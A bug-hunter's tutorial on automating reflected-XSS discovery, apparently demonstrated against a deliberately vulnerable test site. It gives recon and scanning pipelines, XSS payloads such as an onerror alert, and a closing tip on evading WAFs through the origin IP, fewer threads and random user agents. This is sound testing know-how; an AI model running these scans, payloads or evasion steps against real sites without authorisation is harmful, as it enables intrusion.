Advanced XSS Discovery: Streamlining Your Attack Strategy with Cutting-Edge Automation Tools


Hi guys, my name is Mahmoud Attia, aka 0xelkot. I’m an Info-Sec Engineer at Telecom Egypt and a part-time bug hunter.

So let’s start :)

Our talk today is about XSS.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

So how do we find it?

Our methodology to find it will be:

Understanding the Application: Get familiar with the web application you’re testing. Understand its functionality, inputs, outputs, and user roles. Identify areas where user input is accepted and processed.

Manual Testing:

Input Fields: Look for input fields such as forms, search bars, and comment sections where user input is accepted.

HTTP Methods: Test all HTTP methods (GET, POST, PUT, DELETE) to see how the application handles input.

HTML Contexts: Understand where the input is being reflected (e.g., within HTML tags, attribute values, JavaScript code) and how it’s processed.

But we can’t do it for all inputs :(

So let’s automate part of the process of finding XSS:

Let’s take a real target to think about:

If we take `testphp.vulnweb.com` as a target, what do we do?

Find all endpoints and parameters.

Web archive.

Crawler.

Burp Spider.

Fuzzing.

Web archive

Tools:

waybackurls.

gau.

gospider.

Hakrawler.

Katana.

echo 'http://testphp.vulnweb.com' | waybackurls | anew wayback.txt
echo 'http://testphp.vulnweb.com' | gau | anew gau.txt
echo 'http://testphp.vulnweb.com' | katana | anew katana.txt
gospider -s "http://testphp.vulnweb.com/" -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | anew gospider.txt
hakrawler -url "http://testphp.vulnweb.com" -plain -usewayback -wayback | grep "testphp.vulnweb.com" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | anew hakrawler.txt
cat wayback.txt gau.txt katana.txt gospider.txt hakrawler.txt | anew paths.txt

We have now collected all paths and endpoints for our target. We can start attacking right away, or do some fuzzing first.

Here I would like to grep the URLs with extensions like .php, .asp and .aspx out of that list into ext-paths.txt, and then fuzz them for hidden parameters using arjun:

arjun -i ext-paths.txt -oT ext-paths-arjun.txt
-i is for the input file of URLs.
-oT is for output as a text file.

Here we start automating the XSS hunt. I have three ways of attacking:

Via Bash Script

Tools:

kxss: Finds parameter values that are reflected in the response.

uro: Declutters URL lists for crawling.

gf: A wrapper around grep, to help you grep for things.

qsreplace: Replaces all query string values with a user-supplied value.

freq: Requests each URL and checks the response for the alert payload.

airixss: Finds XSS during recon.

dalfox: A powerful XSS scanner.

First Case:

#1

Tools: {gau, gf, uro, qsreplace, freq}.

Command:
echo http://testphp.vulnweb.com | gau | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

gau: Collects all paths from the web archive.

gf: Greps the URLs with the gf xss pattern.

uro: Declutters the URL list to reduce the number of URLs to attack.

qsreplace: Replaces the parameter values with the XSS payload.

freq: Requests each URL and matches the response against the injected value to check whether the XSS fired.

#2

Tools: {kxss, awk, dalfox}.

Command:
cat param.txt | kxss | awk '{print $9}'| dalfox pipe

param.txt: The file of URLs with parameters collected from all of the scans above.

kxss: Finds the reflected parameters and values.

awk: Prints the column holding the URLs.

dalfox: Scans for XSS.

#3

Tools: {qsreplace, airixss}.

Command:
cat param.txt | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
echo http://testphp.vulnweb.com | gau | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

gau: Collects all paths from the web archive.

gf: Greps the URLs with the gf xss pattern.

uro: Declutters the URL list to reduce the number of URLs to attack.

qsreplace: Replaces the parameter values with the XSS payload.

airixss: Checks the responses for the payload to find XSS during recon.
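As an added example (not the author's scripts and not the code of any tool above), here is an offline Python model of what uro and kxss/freq do in the #1 and #2 pipelines: declutter the URL list by path and parameter names, inject a canary wrapped in the characters a payload needs, and report which of those characters came back unencoded. The host `target.example`, the parameter names and the `fake_server` function are constructed stand-ins; in a real test you would pass an HTTP fetch function as `fetch`.

```python
import html
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

SPECIALS = '<>"\''   # chars a payload needs; correct output encoding removes all of them

def declutter(urls):
    """Keep one URL per (scheme, host, path, set of param names), as uro does."""
    seen, kept = set(), []
    for u in urls:
        p = urlparse(u)
        names = tuple(sorted(k for k, _ in parse_qsl(p.query, keep_blank_values=True)))
        key = (p.scheme, p.netloc, p.path, names)
        if key not in seen:
            seen.add(key)
            kept.append(u)
    return kept

def inject(url, param, canary):
    """Set `param` to canary+SPECIALS+canary so the reflection is easy to locate."""
    p = urlparse(url)
    q = [(k, canary + SPECIALS + canary if k == param else v)
         for k, v in parse_qsl(p.query, keep_blank_values=True)]
    return urlunparse(p._replace(query=urlencode(q)))

def unencoded_reflection(body, canary):
    """None if the value is not reflected; else the SPECIALS echoed back raw."""
    start = body.find(canary)
    if start < 0:
        return None
    end = body.find(canary, start + len(canary))
    between = body[start + len(canary):end] if end >= 0 else ""
    return {c for c in SPECIALS if c in between}

def fake_server(url):
    """Constructed stand-in for a target (not a real site): searchFor is
    HTML-escaped, cat is echoed raw into an attribute, others never reflected."""
    params = dict(parse_qsl(urlparse(url).query, keep_blank_values=True))
    safe = "<p>" + html.escape(params.get("searchFor", "")) + "</p>"
    raw = "<input value='" + params.get("cat", "") + "'>"
    return "<html><body>" + safe + raw + "</body></html>"

def scan(urls, fetch=fake_server, canary="kxss7f3a"):
    """Map (path, param) -> set of SPECIALS reflected raw, or None, per URL."""
    findings = {}
    for u in declutter(urls):
        p = urlparse(u)
        for name, _ in parse_qsl(p.query, keep_blank_values=True):
            body = fetch(inject(u, name, canary))
            findings[(p.path, name)] = unencoded_reflection(body, canary)
    return findings
```

A parameter whose result contains all four characters is one where output encoding is missing, while an empty set means the value is being escaped; a raw reflection is a strong indicator, not proof, so confirm the exact context in the browser.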

Second Case:

This is to find XSS vulnerabilities via xray.

To set xray up properly:

./xray_linux_amd64 x # run it twice to create a config file

So what will xray do?

Crawl The input URL.

Fetch inputs on URLs and all parameters on (GET/POST) requests.

Start XSS attack.

Command:
.\xray_windows_386.exe ws --basic http://testphp.vulnweb.com --plugin xss --ho testphp.html

ws: web scanning (short for webscan).

basic: basic crawling of the given URL.

plugin: choose which vulnerability plugins to attack with.

ho: HTML output file.

Third Case:

This is to find XSS via Burp Suite:

Here there are a lot of methodologies; I will show you three of them.

Extensions required here:

Reflector: It looks for request parameter values that are reflected in the response.

Intruder: It’s a tool for automating customized attacks against web applications. It enables you to configure attacks that send the same HTTP request over and over again, inserting different payloads into predefined positions each time.

Burp Bounty: It’s an extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface.

#1

Basic XSS Detection:

Crawl the URL with Burp Spider.

Check Reflector to get the reflected values.

Start the attack using Burp active scan.

#2

Finding XSS using Intruder:

Get a reflected parameter.

Send it to Intruder.

Add your XSS payloads.

Under Grep - Match, add alert(1).

Start the attack and sort by the alert(1) column; the URLs flagged there are the ones vulnerable to XSS.

#3

Finding XSS using Burp Bounty:

Burp Bounty has a lot of profiles that can check for XSS on GET and POST requests across all parameters (URLs, request bodies, headers, etc.).

Crawl the URLs via Burp Spider.

Check the reflected parameters.

Scan them via Burp Bounty.

That’s all for here.

I will show you some results from the last few days of finding XSS.

NOTE:

If you find your target running a WAF, DON’T test with the above methodology; try to find the origin IP and test on it. If you will test through a WAF, try to reduce threads to evade any blocking, or use random user agents besides reduced threads to get XSS results.

Thanks for reading, and I hope you get tons of XSS.

You can reach me at:

twitter

linkedIn

See y’all next time till then.

Happy Hacking ❤
